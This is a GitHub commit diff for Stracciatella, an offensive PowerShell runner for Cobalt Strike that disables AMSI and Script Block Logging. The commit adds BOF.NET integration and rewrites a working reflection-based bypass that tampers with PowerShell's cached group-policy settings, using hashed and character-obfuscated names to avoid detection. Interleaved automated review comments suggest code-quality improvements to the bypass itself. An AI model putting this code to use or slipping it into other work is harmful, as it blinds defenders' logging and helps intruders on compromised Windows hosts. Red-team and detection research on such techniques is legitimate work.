fixed issues/4 with ineffective Script Block Logging
mgeeky committed May 17, 2022
1 parent 29f3a86 commit b54a795
Showing 8 changed files with 29,742 additions and 3,470 deletions.
18 changes: 18 additions & 0 deletions README.md
Expand Up @@ -233,6 +233,24 @@ The associated aggressor script leverages internal Beacon routines to write to a

Sometimes we have Powershell scripts that do not expose any function or reflectively load .NET modules that we would like to invoke from a Powershell runtime. To facilitate that use case, the `stracciatella-script <scriptpath> <command` Beacon command can be used. It reads specified powershell script file and appends given `<command>` separated by semicolon to that script.

### BOF.NET support

Stracciatella's Aggressor script (CNA) detects whether there is BOF.NET loaded and if so, exposes a command:

`bofnet_loadstracciatella`

That issues `bofnet_load stracciatella.exe`. Additionally, Stracciatella will then run through `bofnet_jobassembly` instead of Cobalt's builtin `execute-assembly`.

That behaviour is adjustable by changing global variable in `stracciatella.cna` script:

```perl
#
# If there's BOF.NET loaded in Cobalt Strike, prefer `bofnet_jobassembly` command over `execute-assembly`.
# This is useful when we want to switch our tactics to running inline/in-process via BOF.NET instead of fork & run.
#
$FAVOR_BOFNET_INSTEAD_OF_EXECUTE_ASSEMBLY = "true";
```


## How do you disable AMSI & Script Block logging?

Binary file modified Stracciatella.exe
Binary file not shown.
32,898 changes: 29,537 additions & 3,361 deletions Stracciatella/ClmEmbeddedFiles.cs


165 changes: 73 additions & 92 deletions Stracciatella/Program.cs
Expand Up @@ -12,6 +12,7 @@
using System.IO.Pipes;
using System.Security.Principal;
using System.Security.AccessControl;
using System.Collections;

namespace Stracciatella
{
Expand Down Expand Up @@ -69,8 +70,8 @@ private static void PrintBanner()
{
Console.WriteLine("");
Console.WriteLine(" :: Stracciatella - Powershell runspace with AMSI and Script Block Logging disabled.");
Console.WriteLine(" Mariusz Banach / mgeeky, '19-21 <mb@binary-offensive.com>");
Console.WriteLine(" v0.5");
Console.WriteLine(" Mariusz Banach / mgeeky, '19-22 <mb@binary-offensive.com>");
Console.WriteLine(" v0.6");
Console.WriteLine("");
}

Expand Down Expand Up @@ -224,6 +225,24 @@ private static Options ParseOptions(string[] args)
processed.Add(args[i + 1]);
i += 1;
}
else if (string.Equals(arg, "-l") || string.Equals(arg, "--label"))
{
//
// Undocumented parameter "label".
// Used only to satisfy BOF.NET bofnet_jobs output displaying executed assembly's Args.
// Not to be used directly. Does nothing.
//

if (args.Length - 1 < i + 1)
{
throw new ArgumentException("No value for label.");
}

processed.Add(arg);
processed.Add(args[i + 1]);
processedopts += 2;
i += 1;
}
}

if (processedopts < args.Length )
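Review bot: The bounds check in the new `--label` branch, `if (args.Length - 1 < i + 1)`, reads more naturally as `if (i + 1 >= args.Length)`, and the comment above it saying the option "does nothing" is at odds with the value still being appended to `processed`; suggest extending the comment to say the value is accepted and passed through untouched so that the `bofnet_jobs` listing can show it. The branch also repeats the shape of the preceding value-taking option (bounds check, two `processed.Add` calls, `processedopts += 2`, `i += 1`), which could be folded into one small local helper taking the option name. ParseOptions starts and ends outside the hunk.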
Expand Down Expand Up @@ -436,56 +455,21 @@ public static bool DisableAmsiTechnique2(PowerShell rs)

public static bool DisableScriptLogging(PowerShell rs)
{
bool ret = false;
string param = "";
ret |= DisableScriptLoggingTechnique1(rs, ref param);
ret |= DisableScriptLoggingTechnique2(rs, param);
return ret;
}

public static bool DisableScriptLoggingTechnique1(PowerShell rs, ref string param)
{
AppDomain currentDomain = AppDomain.CurrentDomain;
Assembly[] assems = currentDomain.GetAssemblies();

foreach (Assembly assem in assems)
try
{
if (assem.GlobalAssemblyCache && GetHash(assem.Location.Split('\\').Last()) == 65764965518) // SysXtem.ManaXgement.AutomaXtion.dll
{
Type[] types = assem.GetTypes();
foreach (var tp in types)
{
if (GetHash(tp.Name) == 12579468197) // UXtils
{
var fields = tp.GetFields(BindingFlags.NonPublic | BindingFlags.Static);
foreach (var f in fields)
{
if (GetHash(f.Name) == 12250760746)
{
HashSet<string> names = (HashSet<string>)f.GetValue(null);
foreach (var n in names)
{
if (GetHash(n) == 32086076268) // ScrXiptBloXckLogXging
{
param = n;
break;
}
}

// https://cobXXXbr.io/ScrXXXiptBlock-Warning-Event-Logging-BypXXXass.html
f.SetValue(null, new HashSet<string>(StringComparer.OrdinalIgnoreCase) { });
return true;
}
}
}
}
}
bool ret = false;
ret |= DisableScriptLoggingTechnique1(rs);
return ret;
}
catch (Exception e)
{
Console.WriteLine($"[!] Could not disable Script Block Logging. Unhandled exception occured:\n{e}");
return false;
}

return false;
}

public static bool DisableScriptLoggingTechnique2(PowerShell rs, string param)

public static bool DisableScriptLoggingTechnique1(PowerShell rs)
{
AppDomain currentDomain = AppDomain.CurrentDomain;
Assembly[] assems = currentDomain.GetAssemblies();
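Review bot: The rewritten `DisableScriptLogging` keeps a `bool ret = false; ret |= ...; return ret;` accumulator for what is now a single call; with the second technique and its `ref string param` hand-off gone, the body reduces to `return DisableScriptLoggingTechnique1(rs);`. The removed implementation wrapped its reflection walk in a try/catch that logged the exception and returned false (the catch block is visible among the removed lines); whether the new `DisableScriptLoggingTechnique1` still does so cannot be seen here because its body continues into the next hunk, so it is worth confirming that `GetTypes()` or `GetValue` failures still fall through to `return false` rather than propagating. Both methods start in this hunk but end outside it.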
Expand All @@ -495,67 +479,55 @@ public static bool DisableScriptLoggingTechnique2(PowerShell rs, string param)
if (assem.GlobalAssemblyCache && GetHash(assem.Location.Split('\\').Last()) == 65764965518) // SysXtem.ManaXgement.AutomaXtion.dll
{
Type[] types = assem.GetTypes();
string key = "";
string param = "";

foreach (var tp in types)
{
if (GetHash(tp.Name) == 12579468197) // UXtils
// 12579468197 - ScriXptBloXck
if (GetHash(tp.Name) == 4572158998) // UXtils
{
var fields = tp.GetFields(BindingFlags.NonPublic | BindingFlags.Static);
FieldInfo field = null;
foreach (var f in fields)
{
if (GetHash(f.Name) == 52485150955) // caXchedGrXoupPoXlicySettXings
if (GetHash(f.Name) == 52485150955) // cachXedGrXoupPoXlicySetXtings
{
field = f;
break;
}
}
var cached = (System.Collections.Concurrent.ConcurrentDictionary<string, System.Collections.Generic.Dictionary<string, object>>)f.GetValue(null);

if(field != null)
{
Dictionary<string, object> cached = (Dictionary<string, object>)field.GetValue(null);
string key = param;

if (key.Length == 0)
{
foreach (string k in cached.Keys)
foreach (string n in cached.Keys)
{
if (GetHash(k) == 32086076268) // ScrXiptBloXckLogXging
string val = n;
if (val.Contains("\\"))
{
key = k;
break;
var pos = val.LastIndexOf("\\");
if (pos > 0 && pos + 1 < val.Length)
{
val = val.Substring(pos + 1);
}
}
}
}

if(key.Length > 0 && cached[key] != null)
{
Dictionary<string, object> cached2 = (Dictionary<string, object>)cached[key];
string k2 = "";
string k3 = "";

foreach (string k in cached2.Keys)
{
if (GetHash(k) == 45083803091) // EnabXleScrXiptBloXckLogXging
{
k2 = k;
}
else if (GetHash(k) == 70211596397) // EnabXleScrXiptBloXckInvocXationLogXging
if (GetHash(val) == 32086076268) // ScrXiptBloXckLogXging
{
k3 = k;
}
}
param = val;
key = n;

if (k2.Length > 0 && cached2[k2] != null) cached2[k2] = 0;
if (k3.Length > 0 && cached2[k3] != null) cached2[k3] = 0;
}
if (key.Length > 0 && cached[key] != null)
{
var cached2 = new System.Collections.Generic.Dictionary<string, object>();

cached2[$"Enable{param}"] = 0;
cached2[$"Enable{param.Replace("kL", "kInvocationL")}"] = 0;

var newCache = new Dictionary<string, object>();
newCache.Add($"Enable{param}", 0);
string param2 = param.Replace("kL", "kInvocationL");
newCache.Add($"Enable{param2}", 0);
cached[$"HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Windows\\PowerShell\\{param}"] = newCache;
cached[key] = cached2;

return true;
f.SetValue(null, cached);
}

return true;
}
}
}
}
}
}
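Review bot: The comments on the type-name check disagree: the new line tags `4572158998` as `UXtils` while the new comment directly above it labels the old value `12579468197` as `ScriXptBloXck`, yet the removed line labelled that same old value `UXtils`; one of these labels is wrong and the comment should say which hash maps to which name, since the commit title says the old lookup was the ineffective part. Separately, `f.SetValue(null, cached)` writes back the same `ConcurrentDictionary` reference that was just mutated in place through `cached[key] = cached2`, so it appears to be a no-op and can be dropped. `param.Replace("kL", "kInvocationL")` derives the second key by substring surgery on the first, which is fragile and unexplained; a comment stating the intended resulting key would make the intent reviewable. The `string val = n; if (val.Contains("\\")) { ... LastIndexOf ... Substring }` block also near-duplicates the earlier `assem.Location.Split('\\').Last()` form, and using one idiom for both would keep them consistent. The method's closing braces run past the hunk.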
Expand Down Expand Up @@ -676,6 +648,13 @@ public static string ExecuteCommand(string command, PowerShell rs, CustomPSHost

if(!silent) Info($"PS> {command}");

if (command.Length == 0)
{
if(!silent) Info($"(no command given)");
return "";
}

//pipe.Commands.AddScript("& { " + command + "} *>&1");
pipe.Commands.AddScript(command);
pipe.Commands[0].MergeMyResults(PipelineResultTypes.Error, PipelineResultTypes.Output);
if(addOutDefault) pipe.Commands.Add("Out-default");
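Review bot: The new early return tests `command.Length == 0`, which throws `NullReferenceException` if a caller passes null, and it sits after `Info($"PS> {command}")`, so an empty command still prints a bare `PS> ` line before the "(no command given)" message; `if (string.IsNullOrEmpty(command))` placed before that `Info` call covers both. The `Info($"(no command given)")` interpolation has no placeholders and can be a plain string literal. ExecuteCommand starts and ends outside the hunk.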
Expand All @@ -686,6 +665,7 @@ public static string ExecuteCommand(string command, PowerShell rs, CustomPSHost

output = ((CustomPSHostUserInterface)host.UI).Output;
((CustomPSHostUserInterface)host.UI)._sb = new StringBuilder();

command = "";
}
catch (Exception e)
Expand All @@ -694,6 +674,7 @@ public static string ExecuteCommand(string command, PowerShell rs, CustomPSHost
}
}
}

return output;
}

5 changes: 3 additions & 2 deletions Stracciatella/Stracciatella.csproj
Expand Up @@ -65,6 +65,7 @@
<None Include="FodyWeavers.xsd">
<SubType>Designer</SubType>
</None>
<None Include="packages.config" />
</ItemGroup>
<Import Project="$(MSBuildToolsPath)\Microsoft.CSharp.targets" />
<PropertyGroup>
Expand All @@ -74,12 +75,12 @@
<PreBuildEvent>powershell.exe -File "$(SolutionDir)Stracciatella\Out-CSharpDataClass.ps1" -SolutionDir "$(SolutionDir)." -Target1 "$(SolutionDir)ClmDisableAssembly\bin\$(ConfigurationName)\ClmDisableAssembly.dll" -Target2 "$(SolutionDir)ClmDisableDll\ClmDisableDll.dll" -Verbose</PreBuildEvent>
</PropertyGroup>
<Import Project="VersionSpecificSymbols.prop" />
<Import Project="..\packages\Fody.6.3.0\build\Fody.targets" Condition="Exists('..\packages\Fody.6.3.0\build\Fody.targets')" />
<Target Name="EnsureNuGetPackageBuildImports" BeforeTargets="PrepareForBuild">
<PropertyGroup>
<ErrorText>This project references NuGet package(s) that are missing on this computer. Use NuGet Package Restore to download them. For more information, see http://go.microsoft.com/fwlink/?LinkID=322105. The missing file is {0}.</ErrorText>
</PropertyGroup>
<Error Condition="!Exists('..\packages\Fody.6.3.0\build\Fody.targets')" Text="$([System.String]::Format('$(ErrorText)', '..\packages\Fody.6.3.0\build\Fody.targets'))" />
<Error Condition="!Exists('..\packages\Fody.6.6.1\build\Fody.targets')" Text="$([System.String]::Format('$(ErrorText)', '..\packages\Fody.6.6.1\build\Fody.targets'))" />
<Error Condition="!Exists('..\packages\PropertyChanged.Fody.3.2.10\build\PropertyChanged.Fody.props')" Text="$([System.String]::Format('$(ErrorText)', '..\packages\PropertyChanged.Fody.3.2.10\build\PropertyChanged.Fody.props'))" />
</Target>
<Import Project="..\packages\Fody.6.6.1\build\Fody.targets" Condition="Exists('..\packages\Fody.6.6.1\build\Fody.targets')" />
</Project>
2 changes: 1 addition & 1 deletion Stracciatella/Stracciatella.csproj.user
@@ -1,6 +1,6 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="Current" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<PropertyGroup Condition="'$(Configuration)|$(Platform)' == 'Debug|AnyCPU'">
<StartArguments>-v -p stracciatellapipe -x 147 -e -t 0</StartArguments>
<StartArguments>whoami</StartArguments>
</PropertyGroup>
</Project>
12 changes: 3 additions & 9 deletions Stracciatella/packages.config
@@ -1,9 +1,8 @@
<?xml version="1.0" encoding="utf-8"?>
<packages>
<package id="Fody" version="6.3.0" targetFramework="net45" developmentDependency="true" />
<package id="Microsoft.NETCore.Platforms" version="1.1.0" targetFramework="net45" />
<package id="NETStandard.Library" version="1.6.1" targetFramework="net45" />
<package id="PropertyChanged.Fody" version="3.2.10" targetFramework="net45" />
<package id="Fody" version="6.6.1" targetFramework="net40" developmentDependency="true" />
<package id="NETStandard.Library" version="1.6.1" targetFramework="net40" />
<package id="PropertyChanged.Fody" version="3.2.10" targetFramework="net40" />
<package id="System.Collections" version="4.3.0" targetFramework="net45" />
<package id="System.Collections.Concurrent" version="4.3.0" targetFramework="net45" />
<package id="System.Diagnostics.Debug" version="4.3.0" targetFramework="net45" />
Expand All @@ -15,22 +14,17 @@
<package id="System.Linq" version="4.3.0" targetFramework="net45" />
<package id="System.Linq.Expressions" version="4.3.0" targetFramework="net45" />
<package id="System.Net.Http" version="4.3.4" targetFramework="net45" />
<package id="System.Net.Primitives" version="4.3.0" targetFramework="net45" />
<package id="System.ObjectModel" version="4.3.0" targetFramework="net45" />
<package id="System.Reflection" version="4.3.0" targetFramework="net45" />
<package id="System.Reflection.Extensions" version="4.3.0" targetFramework="net45" />
<package id="System.Reflection.Primitives" version="4.3.0" targetFramework="net45" />
<package id="System.Resources.ResourceManager" version="4.3.0" targetFramework="net45" />
<package id="System.Runtime" version="4.3.0" targetFramework="net45" />
<package id="System.Runtime.Extensions" version="4.3.0" targetFramework="net45" />
<package id="System.Runtime.InteropServices" version="4.3.0" targetFramework="net45" />
<package id="System.Runtime.InteropServices.RuntimeInformation" version="4.3.0" targetFramework="net45" />
<package id="System.Runtime.Numerics" version="4.3.0" targetFramework="net45" />
<package id="System.Text.Encoding" version="4.3.0" targetFramework="net45" />
<package id="System.Text.Encoding.Extensions" version="4.3.0" targetFramework="net45" />
<package id="System.Text.RegularExpressions" version="4.3.0" targetFramework="net45" />
<package id="System.Threading" version="4.3.0" targetFramework="net45" />
<package id="System.Threading.Tasks" version="4.3.0" targetFramework="net45" />
<package id="System.Xml.ReaderWriter" version="4.3.0" targetFramework="net45" />
<package id="System.Xml.XDocument" version="4.3.0" targetFramework="net45" />
</packages>